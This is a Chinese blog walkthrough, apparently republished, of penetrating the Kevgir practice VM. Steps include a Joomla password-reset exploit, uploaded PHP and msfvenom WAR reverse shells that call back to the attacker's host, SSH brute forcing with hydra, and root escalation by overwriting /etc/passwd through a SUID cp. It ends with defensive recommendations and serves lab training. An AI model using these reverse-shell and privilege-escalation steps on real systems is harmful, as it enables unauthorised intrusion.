文章详情

短信预约-IT技能 免费直播动态提醒

请输入下面的图形验证码

提交验证

短信预约提醒成功

Kevg靶机渗透实现 8080端口 8081端口 1322端口实现

2023-08-31 05:43

关注

一、信息搜集

先使用ifconfig查看本机ip:
在这里插入图片描述

用nmap工具扫描本机ip段下的主机:
在这里插入图片描述

发现目标靶机ip为192.168.152.134
查看目标靶机开放了哪些端口:
在这里插入图片描述

发现80,8080,8081,9000端口上开放了HTTP服务,1322端口开放了SSH服务,可以作为漏洞突破点

二、外网突破

  1. 对于8081端口进行突破
    在这里插入图片描述

通过搜索可以发现,有一个对于此系统的漏洞扫描工具joomscan,扫描此网页:
在这里插入图片描述

有很多此系统的漏洞,这里我选择CVE-2008-3681,是远程修改密码,通过点击链接进入,发现已经给出实例:
在这里插入图片描述

我们用这种方法尝试对于8081端口进行修改
先输入192.168.152.134:8081/index.php?option=com_user&view=reset&layout=confirm,输入令牌为“’”,修改password,我设置为admin
在这里插入图片描述
在这里插入图片描述

通过admin账户和刚修改的密码登入系统
在这里插入图片描述

我们通过template manager中的beez来上传反弹shell的php代码,通过查看本机的文件发现自带的有php-reverse-shell.php
在这里插入图片描述

修改其中的ip为主机ip,端口设置为1234
在这里插入图片描述

上传成功后我们用nc工具监听我们的1234端口,同时访问该文件的网页
在这里插入图片描述

python3 -c 'import pty;pty.spawn("/bin/bash")' 来转化为交互式shell,至此获得了shell

  1. 8080端口渗透
    查看网页,tomcat7
    在这里插入图片描述

使用nikto扫描网页 nikto -h http://192.168.211.134:8080
在这里插入图片描述

发现tomcat的弱口令ID:tomcat PW:tomcat,找到管理页并登入
在这里插入图片描述
在这里插入图片描述

登陆之后
在这里插入图片描述

发现可以上传war包, 这里我们可以通过上传一个反弹 shell的war,然后再监听端口,从而拿到shell的控制权
在这里插入图片描述

用kali生成一个war并上传
Msfvenom -p java/jsp_shell_reverse_tcp LHOST = 192.168.211.131 LPORT = 1111 war > a_jsp_shell_1111.war
在这里插入图片描述
在这里插入图片描述

访问http://192.168.211.134:8080/a_jsp_shell_1111/
监听1111端口得到shell
在这里插入图片描述

  1. 1322端口
    首先通过nmap扫描靶机信息:
    在这里插入图片描述

发现1322端口运行的是ssh协议,又发现其版本为OPENSSH 6.6.lpl通过msfconsole查询openssh的漏洞:
在这里插入图片描述

我们使用第3个漏洞,是用于枚举服务器存在的用户的
在这里插入图片描述

设置目标主机和端口,同时设置要爆破用用户名字典,使用的为kali自带的/usr/share/wordlists/metasploit/piata_ssh_userpass.txt,设置成功查看options
在这里插入图片描述

成功后开始run执行,记录搜索出来的用户名
在这里插入图片描述

用hydra进行弱口令爆破admin的密码为admin
在这里插入图片描述

通过ssh远程登录靶机的shell
在这里插入图片描述

成功获取shell
在这里插入图片描述

三、权限提升

通过find / -perm -u=s -type f 2>/dev/null查找系统中赋予了s权限的程序
在这里插入图片描述

我们通过cat etc/passwd查看发现,有root,admin,user三个用户可以是使用
在这里插入图片描述

由于我们权限无法直接访问etc/shadow,所以我们使用之前发现的有s权限的cp命令将其复制到tmp目录下查看
在这里插入图片描述
在这里插入图片描述

发现三个用户名的密码,是密文。将admin信息复制到kali桌面文件夹保存
在这里插入图片描述

用john工具进行密码爆破,由于之前爆破过,报告中我们直接show其结果
在这里插入图片描述

得到admin账户的密码为admin
我们在自己的kali中添加admin用户,并将其用户id和组id设置为0
在这里插入图片描述

在主机中搭建一个简单的http服务器,端口号默认设置为8000
在这里插入图片描述

由于靶机中/tmp文件不需要高权限,所以我们把kali主机中的passwd下载到靶机中的tmp中
在这里插入图片描述

由于cp具有root权限,所以我们用cp把下载的passwd覆盖靶机中原/etc/passwd,此时admin的权限为root
在这里插入图片描述

我们su admin切换用户,使用id和whoami确认奕获得root权限,至此提权成功
在这里插入图片描述

四、 系统防护

  1. 在获得admin的密码的时候,使用到了哈希值爆破密码,我们可以使用对于密码明文加密后的哈希值再次进行加密得到一个“哈希值的哈希值”,这样可以有效的防止如john等hash值爆破工具轻松的破解出明文密码。
  2. 文件上传漏洞是攻击者通过上传⽊马⽂件,直接得到,危害等级超级⾼,现在的⼊侵中上传漏洞也是常见的漏洞。导致该漏洞的原因在于代码作者没有对访客提交的数据进⾏检验或者过滤不严,可以直接提交修改过的数据绕过扩展名的检验。建议对⽂件格式限制,只允许某些格式上传。
  3. 权限提升。权限提升是指利⽤系统中的或是别的⽅法使得⾃⼰突破了原来的限制,能够⾮法访问对⽅⽬录甚⾄是使得⾃⼰能够向那样来获取整个权限。 建议:1.定期进⾏固件、中间件的升级。不要给用户设置⼯作之外的权限。对⽂件格式限制,只允许某些格式上传。
  4. 弱口令爆破漏洞。应用存在默认口令或口令较简单易被猜到。会被一些弱口令爆破工具得到口令。建议一是设置更为复杂的口令,使得爆破口令变得困难,二是一段时间要更换新的口令,防止攻击者利用爆破的口令多次入侵系统。

来源地址:https://blog.csdn.net/m0_56705273/article/details/128163192

阅读原文内容投诉

免责声明:

① 本站未注明“稿件来源”的信息均来自网络整理。其文字、图片和音视频稿件的所属权归原作者所有。本站收集整理出于非商业性的教育和科研之目的,并不意味着本站赞同其观点或证实其内容的真实性。仅作为临时的测试数据,供内部测试之用。本站并未授权任何人以任何方式主动获取本站任何信息。

② 本站未注明“稿件来源”的临时测试数据将在测试完成后最终做删除处理。有问题或投稿请发送至: 邮箱/279061341@qq.com QQ/279061341

软考中级精品资料免费领

  • 历年真题答案解析
  • 备考技巧名师总结
  • 高频考点精准押题
  • 2024年上半年信息系统项目管理师第二批次真题及答案解析(完整版)

    难度     813人已做
    查看
  • 【考后总结】2024年5月26日信息系统项目管理师第2批次考情分析

    难度     354人已做
    查看
  • 【考后总结】2024年5月25日信息系统项目管理师第1批次考情分析

    难度     318人已做
    查看
  • 2024年上半年软考高项第一、二批次真题考点汇总(完整版)

    难度     435人已做
    查看
  • 2024年上半年系统架构设计师考试综合知识真题

    难度     224人已做
    查看

相关文章

发现更多好内容

猜你喜欢

AI推送时光机
位置:首页-资讯-后端开发
咦!没有更多了?去看看其它编程学习网 内容吧
首页课程
资料下载
问答资讯